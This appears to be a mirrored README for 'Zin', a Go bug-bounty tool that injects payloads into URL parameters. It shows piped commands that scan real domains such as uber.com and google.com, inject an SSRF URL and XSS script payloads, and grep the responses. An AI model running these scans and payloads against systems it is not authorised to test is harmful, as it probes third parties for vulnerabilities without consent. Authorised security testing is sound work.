Giter Club home page Giter Club logo

zin's Introduction

alt text

Version 1.0

๐Ÿ˜Ž Zin ๐Ÿ˜Ž

A Payload Injector for bugbounties written in go

Image from Gyazo

Features

  • Inject multiple payloads into all parameters
  • Inject single payloads into all parameters
  • Saves responses into output folder
  • Displays Status Code & Response Length
  • Can grep for patterns in the response
  • Really fast
  • Easy to setup

Install

$ go get -u github.com/ethicalhackingplayground/Zin

New Features

-โœ… Pattern Matching in responses

-โœ… Match Status Codes

Arguments

      _
     (_)
  _____ _ __
 |_  / | '_ \
  / /| | | | |
 /___|_|_| |_|


May the bounties come


  -c int
        the concurrency (default 20)
  -g string
        grep the response for any matches
  -p string
        the payload to be used
  -pL string
        the list of payloads to be used
  -s int
        filter by status codes (default 200)
        

SSRF Example

$ subfinder uber.com | gau | grep "=http" | Zin -c 80 -p http://10.82.214.84:31386/foobar.js -g "SUP3R_S3cret_1337_K3y"

XSS Example

$ subfinder uber.com | gau| Zin -c 80 -p '"><script>alert(matchforthis)script>' -g "matchforthis"

Inject Multiple Payloads

$ cat hosts | gau | grep "&" | Zin -c 80 -pL <payloadfile>

Subdomain Scanning

$ subfinder -dL domains --silent | gau | Zin -c 80 -p <payload>

Only Test Parameters

$ echo "google.com" | gau | grep "&" | Zin -c 80 -p '"><script>alert(matchthis)</script<"' -g "matchthis"

Multiple Hosts

$ cat hosts | gau | Zin -c 80 -p <payload>

If you get a bounty please support by buying me a coffee


Buy Me A Coffee

zin's People

Contributors

ethicalhackingplayground avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.